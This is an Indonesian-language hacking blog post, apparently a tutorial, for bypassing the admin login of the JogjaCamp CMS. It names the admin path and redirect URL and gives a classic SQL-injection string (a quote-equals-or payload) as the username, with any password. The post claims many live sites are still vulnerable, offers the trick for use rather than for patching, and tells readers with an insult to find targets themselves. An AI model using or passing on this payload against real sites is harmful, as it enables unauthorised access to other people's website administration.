CMS JogjaCamp Admin Login Bypass

Sebenernya ini tutor lama juga. Sudah banyak yang tau. Berhubung bingung mau post apaan yasudah share aja. CMS ini adalah CMS asli buatan Indonesia, dan lagi lagi, nge bug sana sini. wkakaka. Dan sampai sekarang juga masih banyak yang vuln.
Google Dork : use your brain, bitch !
User and password : ‘=’ ‘or’

Anggep sudah dapet target vuln. kita masuk dir /admin/
contoh
localhost/admin/
maka kita akan diredirrect ke url
localhost/index.php?action=admin.main

Masukkan
username : ‘=’ ‘or’
password : yuyudhn

Dan…

Jebrettttt !
Masuk ke admin area.

Sekian tutor kali ini semoga bermanfaat.

Shares

One Response

Leave a Reply